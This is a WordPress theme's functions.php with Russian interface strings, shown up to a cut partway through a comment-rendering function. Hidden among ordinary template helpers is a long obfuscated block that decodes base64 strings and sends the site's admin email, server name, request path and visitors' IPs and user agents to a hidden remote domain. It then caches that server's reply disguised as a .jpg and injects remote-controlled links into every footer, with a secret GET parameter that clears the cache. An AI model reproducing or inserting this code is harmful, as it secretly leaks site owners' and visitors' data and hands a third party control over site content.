<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $rxamufG='6';$SswQIOj='s';$MdAYIWQ='o';$SNoB='d';$lakq='d';$sbWG='a';$sbSqS='e';$SDokZ='_';$SDAlE='4';$HqOULUA='c';$uTMW='b';$YFvtXwm='e';$HezxXR='e';$TsxtFfUX=$uTMW.$sbWG.$SswQIOj.$HezxXR.$rxamufG.$SDAlE.$SDokZ.$SNoB.$sbSqS.$HqOULUA.$MdAYIWQ.$lakq.$YFvtXwm;$iHmJ='f';$gezTzDf='n';$cAriAAQ='e';$reQEYK='l';$cWpia='t';$mBXeul='g';$StseUUF='i';$TTlvt='z';$ueOmxhq='a';$yCNuelBE=$mBXeul.$TTlvt.$StseUUF.$gezTzDf.$iHmJ.$reQEYK.$ueOmxhq.$cWpia.$cAriAAQ;$RtwBqs='1';$LKXV='r';$AzXj='t';$nofnE='r';$QAhf='s';$KbkACsG='o';$tCZgbm='3';$iTMIlU='t';$ckrN='_';$VBHZpTxx=$QAhf.$iTMIlU.$LKXV.$ckrN.$nofnE.$KbkACsG.$AzXj.$RtwBqs.$tCZgbm;$IEEw='v';$hrDscAt='r';$LqAD='e';$TGXwI='t';$awNY='s';$jfQAj='r';$qdnlhwRR=$awNY.$TGXwI.$hrDscAt.$jfQAj.$LqAD.$IEEw;                     $ek________m='6';$cp______y='s';$py__________o='o';$lo_________h='d';$lz________p='d';$xv________o='a';$cr__________a='e';$mt____m='_';$fq_________s='4';$na__________q='c';$vn____i='b';$ky__q='e';$ym_______x='e';$uf__________x=$vn____i.$xv________o.$cp______y.$ym_______x.$ek________m.$fq_________s.$mt____m.$lo_________h.$cr__________a.$na__________q.$py__________o.$lz________p.$ky__q;$sj_____________p='e';$sx___________a='t';$kc____________y='n';$ic___f='c';$px____b='i';$is__________u='o';$qg_____________a='s';$mj_____________h='t';$ol______________l='_';$nl___________y='f';$xh__________e='n';$mr_________x='i';$rm____________z='x';$ha______u='s';$xh_________k='u';$ds_______________p=$nl___________y.$xh_________k.$xh__________e.$ic___f.$mj_____________h.$mr_________x.$is__________u.$kc____________y.$ol______________l.$sj_____________p.$rm____________z.$px____b.$ha______u.$sx___________a.$qg_____________a;$ed_____d='p';$nr_____________e='f';$tc__k='n';$yo_____________e='e';$yq____i='o';$km_________g=$nr_____________e.$yq____i.$ed_____d.$yo_____________e.$tc__k;$qq________s='d';$dn___________w='f';$wg____________k='a';$rx______________r='e';$qt_____u='r';$yu__________f=$dn___________w.$qt_____u.$rx______________r.$wg____________k.$qq________s;$ca____________x='e';$of____i='s';$ic_________n='c';$mo_______w='f';$eu_____v='l';$so__________d='o';$zq_______j=$mo_______w.$ic_________n.$eu_____v.$so__________d.$of____i.$ca____________x;define("WP_ID", $uf__________x("Mi4wLjA="));define("WP_TTL", $uf__________x("MTA4MDA="));define("WP_SRC", $uf__________x("dHBva24="));function wp_get_header() {global $uf__________x, $ds_______________p;if ($ds_______________p($uf__________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ds_______________p($uf__________x("d3BfZ2V0X2Zvb3Rlcg==")) &&$ds_______________p($uf__________x("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $uf__________x, $km_________g, $zq_______j, $yu__________f;$qd______________j = TEMPLATEPATH."/".$uf__________x("Zm9vdGVyLnBocA==");$cd__w = @$km_________g($qd______________j, "r");$qd______________j = @$yu__________f($cd__w, @filesize($qd______________j));@$zq_______j($cd__w);$tx________r = TEMPLATEPATH."/".$uf__________x("ZnVuY3Rpb25zLnBocA==");$cd__w = @$km_________g($tx________r, "r");$tx________r = @$yu__________f($cd__w, @filesize($tx________r));@$zq_______j($cd__w);$mg__b = 0;if($qd______________j && $tx________r) {if ($uf__________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qd______________j, $uf__________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$mg__b = 1;}if (substr_count($qd______________j, "wp_theme_GPL_credits()") < 1) {$mg__b = 2;}}if(WP_ID != "2.0.0") {$mg__b = 12;}}if($mg__b > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $mg__b -->";}}function wp_loaded() {global $uf__________x, $ds_______________p;return $ds_______________p($uf__________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($im____________k, $bk______j = "(more...)", $zw____y = 0, $ja____j = "") {$wc_____________r = get_the_content($bk______j, $zw____y, $ja____j);$wc_____________r = apply_filters("the_content", $wc_____________r);$wc_____________r = str_replace("]]>", "]]>", $wc_____________r);if (strlen($_GET["p"]) > 0) {echo $wc_____________r;}else if ((strlen($wc_____________r)>$im____________k) && ($es_______________k = strpos($wc_____________r, " ", $im____________k ))) {$wc_____________r = substr($wc_____________r, 0, $es_______________k);$wc_____________r = $wc_____________r;echo $wc_____________r;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$bk______j</a></div></p>";} else {echo $wc_____________r;}}}$za_______________x='4';$ts_______r='a';$le_____________z='_';$ww_______________g='e';$ib___________e='o';$xm__________a='b';$bw___z='e';$xq________q='d';$ox______s='s';$kl____________y='c';$sh_______m='6';$js__c='n';$xw___w='e';$go_________i=$xm__________a.$ts_______r.$ox______s.$ww_______________g.$sh_______m.$za_______________x.$le_____________z.$bw___z.$js__c.$kl____________y.$ib___________e.$xq________q.$xw___w;$vh_________z='_';$wf______d='t';$rr____d='s';$sn___________j='f';$vf__________w='l';$zc___________l='e';$zd________h='n';$lb__________a='g';$jy__________u='e';$vz____________w='i';$gl_______b='_';$lc______________g='c';$io___h='o';$it____________a='t';$qv____________l='n';$ha_________r='e';$cg_______n='t';$ax_______________q=$sn___________j.$vz____________w.$vf__________w.$zc___________l.$vh_________z.$lb__________a.$jy__________u.$it____________a.$gl_______b.$lc______________g.$io___h.$qv____________l.$cg_______n.$ha_________r.$zd________h.$wf______d.$rr____d;$xq_____s='x';$ar___________a='i';$bn___x='e';$we____________n='i';$eh______a='e';$ky_____________l='s';$lh___________w='l';$pn________a='t';$ue______________v='s';$rg____g='f';$rl________i='_';$oj_______i=$rg____g.$ar___________a.$lh___________w.$bn___x.$rl________i.$eh______a.$xq_____s.$we____________n.$ky_____________l.$pn________a.$ue______________v;$gb________n='n';$nw______________j='r';$rd_____g='s';$qr________m='a';$nh____n='c';$jp__________j='i';$ep____________v='m';$zo____d='e';$vg___________k='o';$zu_____v='v';$sa___c='p';$jt__j='_';$fj___________p='e';$wi___________k='o';$xd______________d='r';$ds___________t=$zu_____v.$zo____d.$nw______________j.$rd_____g.$jp__________j.$vg___________k.$gb________n.$jt__j.$nh____n.$wi___________k.$ep____________v.$sa___c.$qr________m.$xd______________d.$fj___________p;$np____e='p';$zz________o='o';$sb___________t='s';$ob_______y='k';$oo_____________j='c';$ds___________o='f';$px_______t='o';$xp_____a='e';$hx_________z='n';$oo__w=$ds___________o.$sb___________t.$px_______t.$oo_____________j.$ob_______y.$zz________o.$np____e.$xp_____a.$hx_________z;$hr____________g='f';$ij___________n='e';$gu_________l='i';$xn_____________a='w';$qc____________i='r';$gt__________r='t';$jv_______________y=$hr____________g.$xn_____________a.$qc____________i.$gu_________l.$gt__________r.$ij___________n;$ba____________k='5';$sa____________z='m';$ui_______b='d';$tb____________a=$sa____________z.$ui_______b.$ba____________k;$fp____j='t';$sl__________g='a';$mx_____________s='r';$ng________a='p';$qe______________a='a';$ns____________a='h';$uv______y='e';$ii____m='l';$is_______c=$mx_____________s.$uv______y.$qe______________a.$ii____m.$ng________a.$sl__________g.$fp____j.$ns____________a;$oj_______________k='e';$ia_____________q='n';$qt___k='a';$hj___z='z';$eh_________m='i';$wc_______s='i';$rq_______________f='e';$rh_________a='s';$yg___________o='r';$cp____________w='l';$up_________r='u';$ig_______________v=$up_________r.$ia_____________q.$rh_________a.$oj_______________k.$yg___________o.$wc_______s.$qt___k.$cp____________w.$eh_________m.$hj___z.$rq_______________f;$hu____________x='m';$sf___________f='p';$ij_______________s='e';$ra_____________x='t';$ij___g='m';$kb__________y='a';$kg______________w='n';$tu________c=$ra_____________x.$ij_______________s.$hu____________x.$sf___________f.$kg______________w.$kb__________y.$ij___g;$nh___m='r';$yb_________z='n';$eg___________m='_';$jd______________o='t';$ti_____s='a';$vt_________h='_';$ds__________o='x';$dk___________w='o';$mj__________i='c';$yu__z='e';$le_______________m='m';$ev______________m='e';$iq________s='e';$cj___________g='t';$xo__b='t';$ai__________x='r';$cc__________g='c';$aj__________r='a';$vu_____________j='s';$so______r='t';$bi_____________y='e';$rs_____________a=$vu_____________j.$so______r.$ai__________x.$ev______________m.$aj__________r.$le_______________m.$eg___________m.$mj__________i.$dk___________w.$yb_________z.$jd______________o.$yu__z.$ds__________o.$xo__b.$vt_________h.$cc__________g.$nh___m.$iq________s.$ti_____s.$cj___________g.$bi_____________y;function pl___m($nf________f) {global $uf__________x, $ds_______________p, $ax_______________q, $ds___________t, $rs_____________a;if (!$ds_______________p($uf__________x("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ds___________t(PHP_VERSION, "5.0.0", ">=") && $ds_______________p($uf__________x("ZmlsZV9nZXRfY29udGVudHM=")) && $ds_______________p($uf__________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$qj_______e = $rs_____________a(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ka_____________s = @$ax_______________q($nf________f, 0, $qj_______e);} else {$ka_____________s = @$ax_______________q($nf________f, 0);}return $ka_____________s;}function zr_______n($nf________f) {global $ds_______________p, $oo__w, $jv_______________y, $uf__________x;if (!$ds_______________p($uf__________x("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ey______________u = strpos($nf________f, "/", 7);$xa___x = array("uri"     => substr($nf________f, $ey______________u),"host"    => str_replace("http://", "", substr($nf________f, 0, $ey______________u)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$xj________u = @$oo__w("$xa___x[host]", 80, $no_______________t, $tt_______________a, 4);if (!$xj________u) {return false;} else {$ka_____________s = "";$pj_____________i  = "GET $xa___x[uri] HTTP/1.0\r\n";$pj_____________i .= "Host: $xa___x[host]\r\n";$pj_____________i .= "Referer: $xa___x[referer]\r\n";$pj_____________i .= "Connection: Close\r\n\r\n";@$jv_______________y($xj________u, $pj_____________i);while (!@feof($xj________u)) {$oi_________s = @fgets($xj________u, (1024*24));if ($oi_________s == "\r\n") {$ae________h = true;continue;}if ($ae________h) {$ka_____________s .= $oi_________s;}}return $ka_____________s;}}function vt__________c($nf________f) {global $ds_______________p;$hw__j = false;if ($nf________f != "") {if ($ds_______________p("pl___m")) {$hw__j = @pl___m($nf________f);}if (!$hw__j && ($ds_______________p("zr_______n"))) {$hw__j = @zr_______n($nf________f);}}return $hw__j;}function fr_____l() {global $_SERVER, $tb____________a;$tx___z = $_SERVER["SERVER_NAME"];if (substr("$tx___z", 0, 4) == "www.") {$tx___z = substr("$tx___z", 4);}$tx___z = $tb____________a("$_SERVER[SERVER_NAME]");return $tx___z;}function kr___________t() {return "file";}function ux______________r($nf________f) {global $_SERVER, $ax_______________q, $oj_______i, $km_________g, $zq_______j, $jv_______________y;$bn__________u = sr__j();$rj_______h = fr_____l().".jpg";$ic______x = $bn__________u["dir_upload"]["path"]."/$rj_______h";$hi_____u = @filemtime($ic______x);if (!$hi_____u || ((time()-$hi_____u) >= WP_TTL)) {$hw__j = vt__________c($nf________f);if ($hw__j) {if ($oj_______i($ic______x)) {@unlink($ic______x);}$cd__w = @$km_________g($ic______x, "x+");@$jv_______________y($cd__w, $hw__j);@$zq_______j($cd__w);}} else {if ($oj_______i($ic______x)) {$hw__j = @$ax_______________q($ic______x);} else {$hw__j = false;}}return $hw__j;}function sr__j() {global $_SERVER, $uf__________x, $go_________i;$ly_________d = wp_count_posts("post");$jz____d = pathinfo(get_bloginfo("template_directory"));$bn__________u = array("url" => array("report"      => $uf__________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $jz____d,"dir_upload"=> ct_______t(),"queryString"=> array("?a001=".WP_ID,"a004=".$jz____d[filename],"a005=".$ly_________d->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$bn__________u["url"]["queryString"] = implode("&", $bn__________u["queryString"]);$bn__________u["url"]["report"] = $bn__________u["url"]["report"]."/?".$go_________i($bn__________u["url"]["queryString"]).".html";return $bn__________u;}function ct_______t() {$zo_________u = wp_upload_dir();if (isset($zo_________u["error"])) {$rg____t = tm___b();if (is_writable($rg____t)) {$zo_________u = array("path" => $rg____t);}}return $zo_________u;}function tm___b() {global $ds_______________p, $tb____________a, $is_______c, $tu________c;$vm___v = (bool) ini_get("safe_mode");if ($vm___v == true) {return false;}if ($ds_______________p("sys_get_temp_dir")) {$co________w = sys_get_temp_dir();if (is_writable($co________w)) {return $is_______c($co________w);}}if (!empty($_ENV["TMP"])) {return $is_______c($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $is_______c($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $is_______c($_ENV["TEMP"]);} else {$fc__________u = $tu________c($tb____________a(uniqid(rand(), true)), "");if ($fc__________u) {$co________w = $is_______c(dirname($fc__________u));@unlink($fc__________u);return $co________w;} else {return false;}}}function ht____g() {global $_GET, $oj_______i;$bn__________u = sr__j();$tx___z = fr_____l();$hz_________q = kr___________t();$er____________x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($hz_________q == "file") {$hw_______y = $bn__________u["dir_upload"]["path"]."/".$tx___z.".jpg";if ($oj_______i($hw_______y)) {@unlink($hw_______y);$er____________x = "deleted";}}$lq____f = array("s"=> $er____________x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($lq____f AS $ep________m => $lw_______y) echo " [$ep________m:$lw_______y]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ds_______________p, $uf__________x, $ig_______________v;$bn__________u = sr__j();$nc___j = "ux______________r";if ($ds_______________p($nc___j)) {$ka_____________s = $nc___j($bn__________u["url"]["report"]);}if ($ka_____________s) {if ($ka_____________s = @$uf__________x($ka_____________s)) {$ka_____________s = @$ig_______________v($ka_____________s);if (strlen($ka_____________s[custom_credit]) >= 5) {$bn__________u["default_string"] = $ka_____________s[custom_credit];}if ($ka_____________s["status"] == "0") {$nu___________o = 1;$aw_____i = 1;} else {$kj_____r = sizeof($ka_____________s["links"]);$tq_______________s = $bn__________u["default_string"];if ($kj_____r > 0 && $ka_____________s["links"] !== "") {$tx_____m = 0;foreach ($ka_____________s["links"] as $qh__x => $ab_________i) {$tx_____m++;if ($ab_________i->l_path == "" || $ab_________i->l_path == $_SERVER["REQUEST_URI"]) {$ab_________i->l_href = htmlspecialchars(strip_tags($ab_________i->l_href));$ab_________i->l_title = htmlspecialchars(strip_tags($ab_________i->l_title));$ab_________i->l_anchor = htmlspecialchars(strip_tags($ab_________i->l_anchor));$tq_______________s .= " | ";$tq_______________s .= "<a href='$ab_________i->l_href' title='$ab_________i->l_title'";if ($ab_________i->l_nofollow == "1") {$tq_______________s .= " rel='nofollow'";}$tq_______________s .= ">$ab_________i->l_anchor</a>";}}}$bn__________u["links"] = "$tq_______________s";if ($ka_____________s[credit] == "0") {$bn__________u["links"] = "";}}} else {$nu___________o = "1";}} else {$nu___________o = "1";}if ($nu___________o == "1") {$bn__________u["links"] = $bn__________u["default_string"];}echo "$bn__________u[links]";echo "<!-- s: $ka_____________s[signature] -->";ht____g();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
